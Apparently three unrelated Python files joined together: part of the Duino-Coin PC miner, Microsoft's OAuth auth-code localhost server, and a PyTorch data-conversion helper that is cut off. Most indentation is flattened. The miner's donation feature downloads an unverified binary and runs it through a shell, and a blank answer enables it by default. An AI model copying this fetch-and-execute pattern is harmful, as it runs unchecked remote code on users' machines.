+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.73
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = ""
COG = " @"
if os.name != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
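# Illustrative self-check of the DUCO-S1 search above; the "previous hash"
# and nonce are made-up values and this helper is never called by the miner.
def _ducos1_example():
    expected = sha1(("dummyhash" + "42").encode("ascii")).hexdigest()
    nonce, _hashrate = Algorithms.DUCOS1("dummyhash", expected, 1, 100)
    assert nonce == 42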
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
pretty_print(" " + get_string("connection_search"),
"warning", "net0")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(10)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print(f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error", "net0")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & start /low /b Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
        val = str(round((val / 1_000), accuracy)) + " k"
else:
val = str(round(val)) + " "
return val + symbol
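# Illustrative sketch of how get_prefix() scales raw hashrate values; the
# numbers are arbitrary and this helper is never called by the miner.
def _get_prefix_example():
    assert get_prefix("H/s", 2_500_000, 2) == "2.5 MH/s"
    assert get_prefix("H/s", 500, 2) == "500 H/s"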
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
    Displays nicely formatted periodic mining stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
    if uptime < 60:
        return str(round(uptime)) + get_string("uptime_seconds")
    elif uptime >= 7200:
        return str(round(uptime // 3600)) + get_string("uptime_hours")
    elif uptime >= 3600:
        return str(round(uptime // 3600)) + get_string("uptime_hour")
    elif uptime >= 120:
        return str(round(uptime // 60)) + get_string("uptime_minutes")
    else:
        return str(round(uptime // 60)) + get_string("uptime_minute")
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
    HH:MM:SS |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
    HH:MM:SS |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
prompt = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if prompt == "2":
algorithm = "XXHASH"
            intensity = 100
            # The interactive intensity prompt is currently disabled;
            # kept here for reference:
            # intensity = sub(r"\D", "",
            #                 input(Style.NORMAL
            #                       + get_string("ask_intensity")
            #                       + Style.BRIGHT))
            # if not intensity:
            #     intensity = 95
            # elif float(intensity) > 100:
            #     intensity = 100
            # elif float(intensity) < 1:
            #     intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
            except Exception as e:
                pretty_print(get_string('connecting_error')
                             + Style.NORMAL + f' (connection err: {e})',
                             'error', 'net0')
                retry_count += 1
                sleep(10)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
        Main mining loop: connects to the node, requests jobs, computes results and submits shares.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
reject.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used only to
make the wallets display one miner with many threads
instead of many separate miners clogging it up
(like it was before release 2.7.3)
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 8:
threads = 8
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
GetAuthCodeServer.py
|
'''
------------------------------------------------------------------------------
Copyright (c) 2015 Microsoft Corporation
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
------------------------------------------------------------------------------
'''
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from SimpleHTTPServer import SimpleHTTPRequestHandler as BaseHTTPRequestHandler
from SocketServer import TCPServer as HTTPServer
try:
from urllib.parse import urlparse, parse_qs, unquote
except ImportError:
from urlparse import urlparse, parse_qs
from urllib import unquote
import threading
import webbrowser
def get_auth_code(auth_url, redirect_uri):
"""Easy way to get the auth code. Wraps up all the threading
and stuff. Does block main thread.
Args:
auth_url (str): URL of auth server.
redirect_uri (str): Redirect URI, as set for the app. Should be
something like "http://localhost:8080" for this to work.
Returns:
str: A string representing the auth code, sent back by the server
"""
url_netloc = urlparse(redirect_uri).netloc
if ':' not in url_netloc:
host_address = url_netloc
port = 80 # default port
else:
host_address, port = url_netloc.split(':')
port = int(port)
# Set up HTTP server and thread
code_acquired = threading.Event()
s = GetAuthCodeServer((host_address, port), code_acquired, GetAuthCodeRequestHandler)
th = threading.Thread(target=s.serve_forever)
th.start()
webbrowser.open(auth_url)
# At this point the browser will open and the code
# will be extracted by the server
code_acquired.wait() # First wait for the response from the auth server
code = s.auth_code
s.shutdown()
th.join()
return code
class GetAuthCodeServer(HTTPServer, object):
def __init__(self, server_address, stop_event, RequestHandlerClass):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
self._stop_event = stop_event
self.auth_code = None
@property
def auth_code(self):
return self._auth_code
@auth_code.setter
def auth_code(self, value):
self._auth_code = value
if value is not None:
self._stop_event.set()
class GetAuthCodeRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
params = parse_qs(urlparse(self.path).query)
if "code" in params:
# Extract the code query param
self.server.auth_code = params["code"][0]
if "error" in params:
error_msg, error_desc = (unquote(params["error"][0]),
unquote(params["error_description"][0]))
raise RuntimeError("The server returned an error: {} - {}"
.format(error_msg, error_desc))
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(
'<script type="text/javascript">window.close()</script>'
.encode("utf-8")))
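# Minimal usage sketch; the client id, scope and endpoint below are
# placeholders and must be replaced with the values registered for your app:
#
#     redirect_uri = "http://localhost:8080/"
#     auth_url = ("https://login.live.com/oauth20_authorize.srf"
#                 "?client_id=YOUR_CLIENT_ID"
#                 "&scope=onedrive.readwrite"
#                 "&response_type=code"
#                 "&redirect_uri=" + redirect_uri)
#     code = get_auth_code(auth_url, redirect_uri)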
|
data_helper.py
|
from typing import Iterable, Any, Optional
from collections.abc import Sequence
import numbers
import time
from threading import Thread
from queue import Queue
import numpy as np
import torch
def to_device(item: Any, device: str, ignore_keys: list = []) -> Any:
r"""
Overview:
Transfer data to certain device
Arguments:
- item (:obj:`Any`): the item to be transferred
- device (:obj:`str`): the device wanted
        - ignore_keys (:obj:`list`): the keys to be ignored in transfer, default is an empty list
Returns:
- item (:obj:`Any`): the transferred item
    .. note::
Now supports item type: :obj:`torch.nn.Module`, :obj:`torch.Tensor`, :obj:`Sequence`, \
:obj:`dict`, :obj:`numbers.Integral`, :obj:`numbers.Real`, :obj:`np.ndarray`, :obj:`str` and :obj:`None`.
"""
if isinstance(item, torch.nn.Module):
return item.to(device)
elif isinstance(item, torch.Tensor):
return item.to(device)
elif isinstance(item, Sequence):
if isinstance(item, str):
return item
else:
return [to_device(t, device) for t in item]
elif isinstance(item, dict):
new_item = {}
for k in item.keys():
if k in ignore_keys:
new_item[k] = item[k]
else:
new_item[k] = to_device(item[k], device)
return new_item
elif isinstance(item, numbers.Integral) or isinstance(item, numbers.Real):
return item
elif isinstance(item, np.ndarray) or isinstance(item, np.bool_):
return item
elif item is None or isinstance(item, str):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
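# Illustrative sketch of to_device usage with a hypothetical nested batch;
# this helper is not used elsewhere in the module.
def _to_device_example() -> None:
    batch = {'obs': torch.zeros(4, 3), 'meta': 'episode-0'}
    batch = to_device(batch, 'cpu', ignore_keys=['meta'])
    assert batch['obs'].device.type == 'cpu' and batch['meta'] == 'episode-0'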
def to_dtype(item: Any, dtype: type) -> Any:
r"""
Overview:
Change data to certain dtype
Arguments:
- item (:obj:`Any`): the item to be dtype changed
- dtype (:obj:`type`): the type wanted
Returns:
- item (:obj:`object`): the dtype changed item
    .. note::
Now supports item type: :obj:`torch.Tensor`, :obj:`Sequence`, :obj:`dict`
"""
if isinstance(item, torch.Tensor):
return item.to(dtype=dtype)
elif isinstance(item, Sequence):
return [to_dtype(t, dtype) for t in item]
elif isinstance(item, dict):
return {k: to_dtype(item[k], dtype) for k in item.keys()}
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_tensor(
item: Any,
dtype: Optional[torch.dtype] = None,
ignore_keys: list = [],
transform_scalar: bool = True
) -> torch.Tensor:
r"""
Overview:
Change `numpy.ndarray`, sequence of scalars to torch.Tensor, and keep other data types unchanged.
Arguments:
- item (:obj:`Any`): the item to be changed
- dtype (:obj:`type`): the type of wanted tensor
Returns:
        - item (:obj:`torch.Tensor`): the changed tensor
    .. note::
Now supports item type: :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
def transform(d):
if dtype is None:
return torch.as_tensor(d)
else:
return torch.tensor(d, dtype=dtype)
if isinstance(item, dict):
new_data = {}
for k, v in item.items():
if k in ignore_keys:
new_data[k] = v
else:
new_data[k] = to_tensor(v, dtype, ignore_keys, transform_scalar)
return new_data
elif isinstance(item, list) or isinstance(item, tuple):
if len(item) == 0:
return []
elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
return transform(item)
elif hasattr(item, '_fields'): # namedtuple
return type(item)(*[to_tensor(t, dtype) for t in item])
else:
new_data = []
for t in item:
new_data.append(to_tensor(t, dtype, ignore_keys, transform_scalar))
return new_data
elif isinstance(item, np.ndarray):
if dtype is None:
if item.dtype == np.float64:
return torch.FloatTensor(item)
else:
return torch.from_numpy(item)
else:
return torch.from_numpy(item).to(dtype)
elif isinstance(item, bool) or isinstance(item, str):
return item
elif np.isscalar(item):
if transform_scalar:
if dtype is None:
return torch.as_tensor(item)
else:
return torch.as_tensor(item).to(dtype)
else:
return item
elif item is None:
return None
elif isinstance(item, torch.Tensor):
if dtype is None:
return item
else:
return item.to(dtype)
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_ndarray(item: Any, dtype: np.dtype = None) -> np.ndarray:
r"""
Overview:
Change `torch.Tensor`, sequence of scalars to ndarray, and keep other data types unchanged.
Arguments:
- item (:obj:`object`): the item to be changed
- dtype (:obj:`type`): the type of wanted ndarray
Returns:
- item (:obj:`object`): the changed ndarray
    .. note::
Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
def transform(d):
if dtype is None:
return np.array(d)
else:
return np.array(d, dtype=dtype)
if isinstance(item, dict):
new_data = {}
for k, v in item.items():
new_data[k] = to_ndarray(v, dtype)
return new_data
elif isinstance(item, list) or isinstance(item, tuple):
if len(item) == 0:
return None
elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
return transform(item)
elif hasattr(item, '_fields'): # namedtuple
return type(item)(*[to_ndarray(t, dtype) for t in item])
else:
new_data = []
for t in item:
new_data.append(to_ndarray(t, dtype))
return new_data
elif isinstance(item, torch.Tensor):
if dtype is None:
return item.numpy()
else:
return item.numpy().astype(dtype)
elif isinstance(item, np.ndarray):
if dtype is None:
return item
else:
return item.astype(dtype)
elif isinstance(item, bool) or isinstance(item, str):
return item
elif np.isscalar(item):
return np.array(item)
elif item is None:
return None
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_list(item: Any) -> list:
r"""
Overview:
Transform `torch.Tensor`, `numpy.ndarray` to `list`, keep other data types unchanged
Arguments:
- item (:obj:`Any`): the item to be transformed
Returns:
- item (:obj:`list`): the list after transformation
.. note::
Now supports item type: :obj:`torch.Tensor`,:obj:`numpy.ndarray`, :obj:`dict`, :obj:`list`, \
:obj:`tuple` and :obj:`None`
"""
if item is None:
return item
elif isinstance(item, torch.Tensor):
return item.tolist()
elif isinstance(item, np.ndarray):
return item.tolist()
elif isinstance(item, list) or isinstance(item, tuple):
return [to_list(t) for t in item]
elif isinstance(item, dict):
